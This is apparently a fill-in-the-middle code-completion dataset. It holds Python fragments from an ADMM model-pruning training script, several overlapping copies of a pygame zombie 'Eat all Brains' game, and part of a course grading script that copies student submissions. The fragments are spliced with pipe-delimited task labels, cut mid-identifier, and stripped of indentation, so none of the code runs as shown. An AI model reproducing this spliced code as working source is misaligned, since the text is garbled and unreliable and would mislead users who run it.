print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
| batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0 | identifier_body | |
game.py | get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def | (self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusText | decrease_graphX | identifier_name |
game.py | # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center | - self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj | ()
Parameters: | random_line_split |
game.py | # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
|
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRect | self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction | conditional_block |
game.py | # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
|
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRect | l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None | identifier_body |
mark.py | exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if | ef appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
